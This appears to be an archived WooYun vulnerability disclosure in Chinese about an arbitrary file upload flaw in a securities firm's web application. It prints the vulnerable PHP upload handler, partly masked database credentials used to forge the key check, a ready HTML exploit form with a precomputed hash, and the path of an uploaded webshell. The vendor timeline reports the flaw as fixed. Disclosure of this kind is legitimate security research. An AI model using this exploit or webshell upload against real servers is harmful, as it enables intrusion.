乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-14: 细节已通知厂商并且等待厂商处理中 2015-09-16: 厂商已经确认,细节仅向厂商公开 2015-09-26: 细节向核心白帽子及相关领域专家公开 2015-10-06: 细节向普通白帽子公开 2015-10-10: 厂商已经修复漏洞并主动公开,细节向公众公开
backup : http://nx.gtja.com/web.rar审计代码:web/base/appfile.php
<?phpdefine("ROOTPATH", "../");include(ROOTPATH."includes/common.inc.php");set_time_limit(0);//密钥校验$k=md5(strrev($dbUser.$dbPass));$h=$_SERVER["HTTP_REFERER"];$t=$_POST["t"];$m=$_POST["m"];$act=$_POST["act"];$path=$_POST["path"];$md5=md5($k.$t);if($m!=$md5){ echo "ERROR: 安全性校验错误"; exit;}//文件上传if($act=="upload"){ $file=$_FILES["file"]; $r_size=$_POST["r_size"]; if ($_FILES["file"]["ERROR"] > 0){ echo "ERROR:".$_FILES["file"]["ERROR"]; exit; }else{ if($_FILES["file"]["size"]!=$r_size){ echo "ERROR:上传文件错误,文件大小和原文件不匹配"; @write_log("app.log",date("Y-m-d H:i:s",time())." ERROR: 上传文件错误,文件大小和原文件不匹配\n",FILE_APPEND); exit; } //检查目录名 $ToPath="../effect/source/bg"; $Tofile=$ToPath."/".$_FILES["file"]["name"]; if(!is_writable($ToPath)){ echo "ERROR:".$ToPath." 目录不可写,请设置目录属性为可写"; @write_log("app.log",date("Y-m-d H:i:s",time())." ERROR: ".$ToPath." 目录不可写,请设置目录属性为可写\n",FILE_APPEND); exit; } if(file_exists($Tofile) && !is_writable($Tofile)){ echo "ERROR:".$Tofile." 文件不能覆盖,请设置文件属性为可写"; @write_log("app.log",date("Y-m-d H:i:s",time())." ERROR: ".$Tofile." 文件不能覆盖,请设置文件属性为可写\n",FILE_APPEND); exit; } //复制文件 copy($_FILES["file"]["tmp_name"],$Tofile); switch($_FILES["file"]["type"]){ case "application/octet-stream": @chmod($Tofile,0755); break; default: @chmod($Tofile,0666); break; } echo "OK"; @write_log("app.log",date("Y-m-d H:i:s",time())." 安装成功: ".$Tofile."\n",FILE_APPEND); exit; }}function write_log($logfile,$logtext,$mode){ if(intval(substr(phpversion(),0,1))>=5){ @file_put_contents($logfile,$logtext,$mode); }else{ $fp = fopen($logfile,"a"); fwrite($fp,$logtext); fclose($fp); }}?>
$dbHost="localhost";$dbName="gtj***";$dbUser="gtj***";$dbPass="12****21";
exp:
<html><form action="http://nx.gtja.com/base/appfile.php" method="post" enctype="multipart/form-data"> <input name="r_size" id="r_size" value="269" /> <input name="t" id="t" value="1" /> <input name="m" id="m" value="c23afc0eeee3d2d86e1aacf411fcb623" /> <input name="act" id="act" value="upload" /> <input type="file" name="file" id="file" /> <input type="submit" /></form></html>
webshell:http://nx.gtja.com/effect/source/bg/search.php
删 改
危害等级:中
漏洞Rank:5
确认时间:2015-09-16 16:45
谢谢提醒。
2015-10-10:已经修复。谢谢
2015-10-10:非关键应用